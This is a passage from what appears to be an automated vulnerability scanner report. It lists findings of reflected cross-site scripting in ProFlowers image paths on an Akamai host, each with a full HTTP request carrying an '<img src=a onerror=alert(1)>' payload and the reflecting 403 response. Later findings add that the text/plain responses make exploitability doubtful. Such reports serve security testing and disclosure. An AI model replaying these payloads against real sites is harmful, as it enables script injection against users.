Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQnewvdaybqt11_PF

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload b5539<img%20src%3da%20onerror%3dalert(1)>cbd1b68987b was submitted in the REST URL parameter 9. This input was echoed as b5539<img src=a onerror=alert(1)>cbd1b68987b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQnewvdaybqt11_PFb5539<img%20src%3da%20onerror%3dalert(1)>cbd1b68987b?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/portalslanding.aspx?pageid=HIC&ref=fgvprtlsmsn_hp021111_Unknown_DODControl_1Dznastchoc18rr&Keyword=PF_VDAY11_300x250_DODControl_1Dznastchoc18rrHgsksRby_html&Network=MSN_com
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 94
Cache-Control: no-store
Date: Fri, 11 Feb 2011 18:33:03 GMT
Connection: close

Unable to find /ProvideCommerce/MBQnewvdaybqt11_PFb5539<img src=a onerror=alert(1)>cbd1b68987b

1.24. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQrosesalstro_dmsk11_PF [REST URL parameter 9]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQrosesalstro_dmsk11_PF

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload f2637<img%20src%3da%20onerror%3dalert(1)>a8c2691e770 was submitted in the REST URL parameter 9. This input was echoed as f2637<img src=a onerror=alert(1)>a8c2691e770 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQrosesalstro_dmsk11_PFf2637<img%20src%3da%20onerror%3dalert(1)>a8c2691e770?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/portalslanding.aspx?pageid=HIC&ref=fgvprtlsmsn_hp021111_Unknown_DODControl_1Dznastchoc18rr&Keyword=PF_VDAY11_300x250_DODControl_1Dznastchoc18rrHgsksRby_html&Network=MSN_com
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 100
Cache-Control: no-store
Date: Fri, 11 Feb 2011 18:33:02 GMT
Connection: close

Unable to find /ProvideCommerce/MBQrosesalstro_dmsk11_PFf2637<img src=a onerror=alert(1)>a8c2691e770

1.25. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQshowersflowers_dmsk11_PF [REST URL parameter 9]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQshowersflowers_dmsk11_PF

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload 10a2c<img%20src%3da%20onerror%3dalert(1)>2c86fed5b29 was submitted in the REST URL parameter 9. This input was echoed as 10a2c<img src=a onerror=alert(1)>2c86fed5b29 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQshowersflowers_dmsk11_PF10a2c<img%20src%3da%20onerror%3dalert(1)>2c86fed5b29?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/portalslanding.aspx?pageid=HIC&ref=fgvprtlsmsn_hp021111_Unknown_DODControl_1Dznastchoc18rr&Keyword=PF_VDAY11_300x250_DODControl_1Dznastchoc18rrHgsksRby_html&Network=MSN_com
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 103
Cache-Control: no-store
Date: Fri, 11 Feb 2011 18:32:55 GMT
Connection: close

Unable to find /ProvideCommerce/MBQshowersflowers_dmsk11_PF10a2c<img src=a onerror=alert(1)>2c86fed5b29

1.26. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQtruspec11_PF [REST URL parameter 9]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQtruspec11_PF

Issue detail

The value of REST URL parameter 9 is copied into the response body without encoding. The payload 6a5cf<img%20src%3da%20onerror%3dalert(1)>3e463c184e7 was submitted in the REST URL parameter 9 and was echoed, URL-decoded, as 6a5cf<img src=a onerror=alert(1)>3e463c184e7 in the application's response.

The proof-of-concept uses an <img> element whose onerror event handler would execute arbitrary JavaScript if the response were rendered as HTML. Note, however, that the response below is a 403 with Content-Type: text/plain and no X-Content-Type-Options: nosniff header: a browser that honours the declared type displays the reflected markup as text, and the handler fires only where the content is interpreted as HTML (for example in older browsers that sniff text/plain responses). Confirm the High/Certain rating manually before reporting this as exploitable cross-site scripting.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQtruspec11_PF6a5cf<img%20src%3da%20onerror%3dalert(1)>3e463c184e7?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/portalslanding.aspx?pageid=HIC&ref=fgvprtlsmsn_hp021111_Unknown_DODControl_1Dznastchoc18rr&Keyword=PF_VDAY11_300x250_DODControl_1Dznastchoc18rrHgsksRby_html&Network=MSN_com
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 91
Cache-Control: no-store
Date: Fri, 11 Feb 2011 18:33:03 GMT
Connection: close

Unable to find /ProvideCommerce/MBQtruspec11_PF6a5cf<img src=a onerror=alert(1)>3e463c184e7

1.27. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQvdaytulipfreesia10_PF [REST URL parameter 9]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQvdaytulipfreesia10_PF

Issue detail

The value of REST URL parameter 9 is copied into the response body without encoding. The payload b56c4<img%20src%3da%20onerror%3dalert(1)>17d73dc25f3 was submitted in the REST URL parameter 9 and was echoed, URL-decoded, as b56c4<img src=a onerror=alert(1)>17d73dc25f3 in the application's response.

The proof-of-concept uses an <img> element whose onerror event handler would execute arbitrary JavaScript if the response were rendered as HTML. Note, however, that the response below is a 403 with Content-Type: text/plain and no X-Content-Type-Options: nosniff header: a browser that honours the declared type displays the reflected markup as text, and the handler fires only where the content is interpreted as HTML (for example in older browsers that sniff text/plain responses). Confirm the High/Certain rating manually before reporting this as exploitable cross-site scripting.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQvdaytulipfreesia10_PFb56c4<img%20src%3da%20onerror%3dalert(1)>17d73dc25f3?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/portalslanding.aspx?pageid=HIC&ref=fgvprtlsmsn_hp021111_Unknown_DODControl_1Dznastchoc18rr&Keyword=PF_VDAY11_300x250_DODControl_1Dznastchoc18rrHgsksRby_html&Network=MSN_com
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 100
Cache-Control: no-store
Date: Fri, 11 Feb 2011 18:33:02 GMT
Connection: close

Unable to find /ProvideCommerce/MBQvdaytulipfreesia10_PFb56c4<img src=a onerror=alert(1)>17d73dc25f3

1.28. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ORC3inrdphal_letitgrowmug10_PC1855_PF [REST URL parameter 9]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ORC3inrdphal_letitgrowmug10_PC1855_PF

Issue detail

The value of REST URL parameter 9 is copied into the response body without encoding. The payload ab17a<img%20src%3da%20onerror%3dalert(1)>cf29162016c was submitted in the REST URL parameter 9 and was echoed, URL-decoded, as ab17a<img src=a onerror=alert(1)>cf29162016c in the application's response.

The proof-of-concept uses an <img> element whose onerror event handler would execute arbitrary JavaScript if the response were rendered as HTML. Note, however, that the response below is a 403 with Content-Type: text/plain and no X-Content-Type-Options: nosniff header: a browser that honours the declared type displays the reflected markup as text, and the handler fires only where the content is interpreted as HTML (for example in older browsers that sniff text/plain responses). Confirm the High/Certain rating manually before reporting this as exploitable cross-site scripting.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ORC3inrdphal_letitgrowmug10_PC1855_PFab17a<img%20src%3da%20onerror%3dalert(1)>cf29162016c?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/portalslanding.aspx?pageid=HIC&ref=fgvprtlsmsn_hp021111_Unknown_DODControl_1Dznastchoc18rr&Keyword=PF_VDAY11_300x250_DODControl_1Dznastchoc18rrHgsksRby_html&Network=MSN_com
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 113
Cache-Control: no-store
Date: Fri, 11 Feb 2011 18:33:03 GMT
Connection: close

Unable to find /ProvideCommerce/ORC3inrdphal_letitgrowmug10_PC1855_PFab17a<img src=a onerror=alert(1)>cf29162016c

1.29. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLT6inredrose_dkbsktrb09CAT_PF [REST URL parameter 9]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLT6inredrose_dkbsktrb09CAT_PF

Issue detail

The value of REST URL parameter 9 is copied into the response body without encoding. The payload db227<img%20src%3da%20onerror%3dalert(1)>38f92df87c2 was submitted in the REST URL parameter 9 and was echoed, URL-decoded, as db227<img src=a onerror=alert(1)>38f92df87c2 in the application's response.

The proof-of-concept uses an <img> element whose onerror event handler would execute arbitrary JavaScript if the response were rendered as HTML. Note, however, that the response below is a 403 with Content-Type: text/plain and no X-Content-Type-Options: nosniff header: a browser that honours the declared type displays the reflected markup as text, and the handler fires only where the content is interpreted as HTML (for example in older browsers that sniff text/plain responses). Confirm the High/Certain rating manually before reporting this as exploitable cross-site scripting.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLT6inredrose_dkbsktrb09CAT_PFdb227<img%20src%3da%20onerror%3dalert(1)>38f92df87c2?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/portalslanding.aspx?pageid=HIC&ref=fgvprtlsmsn_hp021111_Unknown_DODControl_1Dznastchoc18rr&Keyword=PF_VDAY11_300x250_DODControl_1Dznastchoc18rrHgsksRby_html&Network=MSN_com
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 106
Cache-Control: no-store
Date: Fri, 11 Feb 2011 18:33:02 GMT
Connection: close

Unable to find /ProvideCommerce/PLT6inredrose_dkbsktrb09CAT_PFdb227<img src=a onerror=alert(1)>38f92df87c2

1.30. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLT6invdayros_redpot11_vdayheartpick_PC1844_PF [REST URL parameter 9]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLT6invdayros_redpot11_vdayheartpick_PC1844_PF

Issue detail

The value of REST URL parameter 9 is copied into the response body without encoding. The payload 2d1b8<img%20src%3da%20onerror%3dalert(1)>9b08ddae393 was submitted in the REST URL parameter 9 and was echoed, URL-decoded, as 2d1b8<img src=a onerror=alert(1)>9b08ddae393 in the application's response.

The proof-of-concept uses an <img> element whose onerror event handler would execute arbitrary JavaScript if the response were rendered as HTML. Note, however, that the response below is a 403 with Content-Type: text/plain and no X-Content-Type-Options: nosniff header: a browser that honours the declared type displays the reflected markup as text, and the handler fires only where the content is interpreted as HTML (for example in older browsers that sniff text/plain responses). Confirm the High/Certain rating manually before reporting this as exploitable cross-site scripting.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLT6invdayros_redpot11_vdayheartpick_PC1844_PF2d1b8<img%20src%3da%20onerror%3dalert(1)>9b08ddae393?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/portalslanding.aspx?pageid=HIC&ref=fgvprtlsmsn_hp021111_Unknown_DODControl_1Dznastchoc18rr&Keyword=PF_VDAY11_300x250_DODControl_1Dznastchoc18rrHgsksRby_html&Network=MSN_com
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 122
Cache-Control: no-store
Date: Fri, 11 Feb 2011 18:33:03 GMT
Connection: close

Unable to find /ProvideCommerce/PLT6invdayros_redpot11_vdayheartpick_PC1844_PF2d1b8<img src=a onerror=alert(1)>9b08ddae393

1.31. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLThrtbmboo_redrocks10_PC1827_PF [REST URL parameter 9]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLThrtbmboo_redrocks10_PC1827_PF

Issue detail

The value of REST URL parameter 9 is copied into the response body without encoding. The payload e5fa6<img%20src%3da%20onerror%3dalert(1)>a43e173e065 was submitted in the REST URL parameter 9 and was echoed, URL-decoded, as e5fa6<img src=a onerror=alert(1)>a43e173e065 in the application's response.

The proof-of-concept uses an <img> element whose onerror event handler would execute arbitrary JavaScript if the response were rendered as HTML. Note, however, that the response below is a 403 with Content-Type: text/plain and no X-Content-Type-Options: nosniff header: a browser that honours the declared type displays the reflected markup as text, and the handler fires only where the content is interpreted as HTML (for example in older browsers that sniff text/plain responses). Confirm the High/Certain rating manually before reporting this as exploitable cross-site scripting.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLThrtbmboo_redrocks10_PC1827_PFe5fa6<img%20src%3da%20onerror%3dalert(1)>a43e173e065?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/portalslanding.aspx?pageid=HIC&ref=fgvprtlsmsn_hp021111_Unknown_DODControl_1Dznastchoc18rr&Keyword=PF_VDAY11_300x250_DODControl_1Dznastchoc18rrHgsksRby_html&Network=MSN_com
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 108
Cache-Control: no-store
Date: Fri, 11 Feb 2011 18:32:54 GMT
Connection: close

Unable to find /ProvideCommerce/PLThrtbmboo_redrocks10_PC1827_PFe5fa6<img src=a onerror=alert(1)>a43e173e065

1.32. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ROS12assrt50_rbye11_PF [REST URL parameter 9]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ROS12assrt50_rbye11_PF

Issue detail

The value of REST URL parameter 9 is copied into the response body without encoding. The payload 3768b<img%20src%3da%20onerror%3dalert(1)>550117928d0 was submitted in the REST URL parameter 9 and was echoed, URL-decoded, as 3768b<img src=a onerror=alert(1)>550117928d0 in the application's response.

The proof-of-concept uses an <img> element whose onerror event handler would execute arbitrary JavaScript if the response were rendered as HTML. Note, however, that the response below is a 403 with Content-Type: text/plain and no X-Content-Type-Options: nosniff header: a browser that honours the declared type displays the reflected markup as text, and the handler fires only where the content is interpreted as HTML (for example in older browsers that sniff text/plain responses). Confirm the High/Certain rating manually before reporting this as exploitable cross-site scripting.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ROS12assrt50_rbye11_PF3768b<img%20src%3da%20onerror%3dalert(1)>550117928d0?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/portalslanding.aspx?pageid=HIC&ref=fgvprtlsmsn_hp021111_Unknown_DODControl_1Dznastchoc18rr&Keyword=PF_VDAY11_300x250_DODControl_1Dznastchoc18rrHgsksRby_html&Network=MSN_com
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 98
Cache-Control: no-store
Date: Fri, 11 Feb 2011 18:32:51 GMT
Connection: close

Unable to find /ProvideCommerce/ROS12assrt50_rbye11_PF3768b<img src=a onerror=alert(1)>550117928d0

1.33. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ROS12assrt_gv10_PF [REST URL parameter 9]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ROS12assrt_gv10_PF

Issue detail

The value of REST URL parameter 9 is copied into the response body without encoding. The payload b57ec<img%20src%3da%20onerror%3dalert(1)>8ac26b53db2 was submitted in the REST URL parameter 9 and was echoed, URL-decoded, as b57ec<img src=a onerror=alert(1)>8ac26b53db2 in the application's response.

The proof-of-concept uses an <img> element whose onerror event handler would execute arbitrary JavaScript if the response were rendered as HTML. Note, however, that the response below is a 403 with Content-Type: text/plain and no X-Content-Type-Options: nosniff header: a browser that honours the declared type displays the reflected markup as text, and the handler fires only where the content is interpreted as HTML (for example in older browsers that sniff text/plain responses). Confirm the High/Certain rating manually before reporting this as exploitable cross-site scripting.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ROS12assrt_gv10_PFb57ec<img%20src%3da%20onerror%3dalert(1)>8ac26b53db2?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/portalslanding.aspx?pageid=HIC&ref=fgvprtlsmsn_hp021111_Unknown_DODControl_1Dznastchoc18rr&Keyword=PF_VDAY11_300x250_DODControl_1Dznastchoc18rrHgsksRby_html&Network=MSN_com
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 94
Cache-Control: no-store
Date: Fri, 11 Feb 2011 18:32:52 GMT
Connection: close

Unable to find /ProvideCommerce/ROS12assrt_gv10_PFb57ec<img src=a onerror=alert(1)>8ac26b53db2

1.34. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ROS12pink50_gv11_PF [REST URL parameter 9]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ROS12pink50_gv11_PF

Issue detail

The value of REST URL parameter 9 is copied into the response body without encoding. The payload 2a5a2<img%20src%3da%20onerror%3dalert(1)>220f35153ea was submitted in the REST URL parameter 9 and was echoed, URL-decoded, as 2a5a2<img src=a onerror=alert(1)>220f35153ea in the application's response.

The proof-of-concept uses an <img> element whose onerror event handler would execute arbitrary JavaScript if the response were rendered as HTML. Note, however, that the response below is a 403 with Content-Type: text/plain and no X-Content-Type-Options: nosniff header: a browser that honours the declared type displays the reflected markup as text, and the handler fires only where the content is interpreted as HTML (for example in older browsers that sniff text/plain responses). Confirm the High/Certain rating manually before reporting this as exploitable cross-site scripting.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ROS12pink50_gv11_PF2a5a2<img%20src%3da%20onerror%3dalert(1)>220f35153ea?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/portalslanding.aspx?pageid=HIC&ref=fgvprtlsmsn_hp021111_Unknown_DODControl_1Dznastchoc18rr&Keyword=PF_VDAY11_300x250_DODControl_1Dznastchoc18rrHgsksRby_html&Network=MSN_com
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 95
Cache-Control: no-store
Date: Fri, 11 Feb 2011 18:32:55 GMT
Connection: close

Unable to find /ProvideCommerce/ROS12pink50_gv11_PF2a5a2<img src=a onerror=alert(1)>220f35153ea

1.35. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ROS12red40_rbye11_3_FV_PF [REST URL parameter 9]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ROS12red40_rbye11_3_FV_PF

Issue detail

The value of REST URL parameter 9 is copied into the response body without encoding. The payload 80316<img%20src%3da%20onerror%3dalert(1)>5b91b361cb9 was submitted in the REST URL parameter 9 and was echoed, URL-decoded, as 80316<img src=a onerror=alert(1)>5b91b361cb9 in the application's response.

The proof-of-concept uses an <img> element whose onerror event handler would execute arbitrary JavaScript if the response were rendered as HTML. Note, however, that the response below is a 403 with Content-Type: text/plain and no X-Content-Type-Options: nosniff header: a browser that honours the declared type displays the reflected markup as text, and the handler fires only where the content is interpreted as HTML (for example in older browsers that sniff text/plain responses). Confirm the High/Certain rating manually before reporting this as exploitable cross-site scripting.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ROS12red40_rbye11_3_FV_PF80316<img%20src%3da%20onerror%3dalert(1)>5b91b361cb9?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/portalslanding.aspx?pageid=HIC&ref=fgvprtlsmsn_hp021111_Unknown_DODControl_1Dznastchoc18rr&Keyword=PF_VDAY11_300x250_DODControl_1Dznastchoc18rrHgsksRby_html&Network=MSN_com
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 101
Cache-Control: no-store
Date: Fri, 11 Feb 2011 18:32:50 GMT
Connection: close

Unable to find /ProvideCommerce/ROS12red40_rbye11_3_FV_PF80316<img src=a onerror=alert(1)>5b91b361cb9

1.36. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ROS12red50_rbye11_FV_PF [REST URL parameter 9]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ROS12red50_rbye11_FV_PF

Issue detail

The value of REST URL parameter 9 is copied into the response body without encoding. The payload c0749<img%20src%3da%20onerror%3dalert(1)>3cf25d69d4b was submitted in the REST URL parameter 9 and was echoed, URL-decoded, as c0749<img src=a onerror=alert(1)>3cf25d69d4b in the application's response.

The proof-of-concept uses an <img> element whose onerror event handler would execute arbitrary JavaScript if the response were rendered as HTML. Note, however, that the response below is a 403 with Content-Type: text/plain and no X-Content-Type-Options: nosniff header: a browser that honours the declared type displays the reflected markup as text, and the handler fires only where the content is interpreted as HTML (for example in older browsers that sniff text/plain responses). Confirm the High/Certain rating manually before reporting this as exploitable cross-site scripting.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ROS12red50_rbye11_FV_PFc0749<img%20src%3da%20onerror%3dalert(1)>3cf25d69d4b?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
